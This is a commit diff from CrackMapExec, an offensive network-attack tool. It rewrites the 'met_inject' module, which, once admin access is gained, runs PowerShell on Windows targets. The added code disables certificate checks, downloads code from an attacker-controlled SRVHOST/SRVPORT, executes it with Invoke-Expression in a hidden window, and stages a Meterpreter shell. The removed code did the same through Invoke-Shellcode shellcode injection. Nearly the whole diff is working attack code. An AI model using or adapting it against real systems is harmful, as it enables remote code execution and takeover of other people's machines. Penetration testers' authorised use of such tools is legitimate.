Merge branch 'v5-dev' of https://github.com/byt3bl33d3r/CrackMapExec

mpgn · mpgn · commit 52528a44bbe1 · 2020-05-03T14:32:17.000-04:00
diff --git a/cme/modules/met_inject.py b/cme/modules/met_inject.py
@@ -14,63 +14,43 @@ class CMEModule:
 
     def options(self, context, module_options):
         '''
-            LHOST    IP hosting the handler
-            LPORT    Handler port
-            PAYLOAD  Payload to inject: reverse_http or reverse_https (default: reverse_https)
-            PROCID   Process ID to inject into (default: current powershell process)
+            SRVHOST     IP hosting of the stager server
+            SRVPORT     Stager port
+            RAND        Random string given by metasploit
+            SSL         Stager server use https or http (default: https)
         '''
 
-        self.met_payload = 'reverse_https'
-        self.procid = None
+        self.met_ssl = 'https'
 
-        if not 'LHOST' in module_options or not 'LPORT' in module_options:
-            context.log.error('LHOST and LPORT options are required!')
+        if not 'SRVHOST' in module_options or not 'SRVPORT' in module_options or not 'RAND' in module_options:
+            context.log.error('SRVHOST and SRVPORT  and RAND options are required!')
             exit(1)
 
-        if 'PAYLOAD' in module_options:
-            self.met_payload = module_options['PAYLOAD']
+        if 'SSL' in module_options:
+            self.met_ssl = module_options['SSL']
 
-        if 'PROCID' in module_options:
-            self.procid = module_options['PROCID']
-
-        self.lhost = module_options['LHOST']
-        self.lport = module_options['LPORT']
-
-        self.ps_script = obfs_ps_script('powersploit/CodeExecution/Invoke-Shellcode.ps1')
+        self.srvhost = module_options['SRVHOST']
+        self.srvport = module_options['SRVPORT']
+        self.rand = module_options['RAND']
 
     def on_admin_login(self, context, connection):
-        #PowerSploit's 3.0 update removed the Meterpreter injection options in Invoke-Shellcode
-        #so now we have to manually generate a valid Meterpreter request URL and download + exec the staged shellcode
-
-        payload = """$CharArray = 48..57 + 65..90 + 97..122 | ForEach-Object {{[Char]$_}}
-        $SumTest = $False
-        while ($SumTest -eq $False)
-        {{
-            $GeneratedUri = $CharArray | Get-Random -Count 4
-            $SumTest = (([int[]] $GeneratedUri | Measure-Object -Sum).Sum % 0x100 -eq 92)
-        }}
-        $RequestUri = -join $GeneratedUri
-        $Request = "{}://{}:{}/$($RequestUri)"
-        $WebClient = New-Object System.Net.WebClient
-        [Byte[]]$bytes = $WebClient.DownloadData($Request)
-        Invoke-Shellcode -Force -Shellcode $bytes""".format('http' if self.met_payload == 'reverse_http' else 'https',
-                                                            self.lhost,
-                                                            self.lport)
-
-        if self.procid:
-            payload += " -ProcessID {}".format(self.procid)
-
-        launcher = gen_ps_iex_cradle(context, 'Invoke-Shellcode.ps1', payload, post_back=False)
-
-        connection.ps_execute(launcher, force_ps32=True)
+        # stolen from https://github.com/jaredhaight/Invoke-MetasploitPayload
+        command = """$url="{}://{}:{}/{}"
+        $DownloadCradle ='[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}};$client = New-Object Net.WebClient;$client.Proxy=[Net.WebRequest]::GetSystemWebProxy();$client.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;Invoke-Expression $client.downloadstring('''+$url+'''");'
+        $PowershellExe=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\powershell.exe'
+        if([Environment]::Is64BitProcess) {{ $PowershellExe='powershell.exe'}}
+        $ProcessInfo = New-Object System.Diagnostics.ProcessStartInfo
+        $ProcessInfo.FileName=$PowershellExe
+        $ProcessInfo.Arguments="-nop -c $DownloadCradle"
+        $ProcessInfo.UseShellExecute = $False
+        $ProcessInfo.RedirectStandardOutput = $True
+        $ProcessInfo.CreateNoWindow = $True
+        $ProcessInfo.WindowStyle = "Hidden"
+        $Process = [System.Diagnostics.Process]::Start($ProcessInfo)""".format(
+                'http' if self.met_ssl == 'http' else 'https', 
+                self.srvhost, 
+                self.srvport, 
+                self.rand)
+        context.log.debug(command)
+        connection.ps_execute(command, force_ps32=True)
         context.log.success('Executed payload')
-
-    def on_request(self, context, request):
-        if 'Invoke-Shellcode.ps1' == request.path[1:]:
-            request.send_response(200)
-            request.end_headers()
-            request.wfile.write(self.ps_script.encode())
-            request.stop_tracking_host()
-        else:
-            request.send_response(404)
-            request.end_headers()
diff --git a/cme/servers/http.py b/cme/servers/http.py
@@ -90,7 +90,6 @@ def shutdown(self):
         self.server.shutdown()
         self.server.socket.close()
         self.server.server_close()
-        self._stop()
 
         # make sure all the threads are killed
         for thread in threading.enumerate():
